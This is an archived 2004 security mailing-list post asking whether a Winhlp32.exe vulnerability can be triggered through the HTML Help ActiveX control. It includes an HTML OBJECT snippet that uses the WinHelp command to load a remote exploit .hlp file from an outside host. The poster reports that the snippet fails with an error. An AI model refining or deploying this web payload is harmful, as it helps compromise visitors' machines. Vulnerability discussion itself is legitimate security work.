OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
New Winhlp32.exe vuln

bad_sonpimp.it
Date: Fri Dec 24 2004 - 17:53:52 CST


Can this vulnerability be exploited using the HTML help ActiveX control ?

I am trying:
<OBJECT
   id=winhelp
   type="application/x-oleobject"
   classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
   codebase="hhctrl.ocx#Version=5,02,3790,1194"
   width=100
   height=100
>
   <PARAM name="Command" value="WinHelp">
   <PARAM name="Button" value="Text:Exploit">
   <PARAM name="Item1"
value="http://www.xfocus.net/flashsky/icoExp/search.hlp">MyWindow">

</OBJECT>

However, i get an error "This operation is allowed only within HTML help" ?

Is this approach wrong ?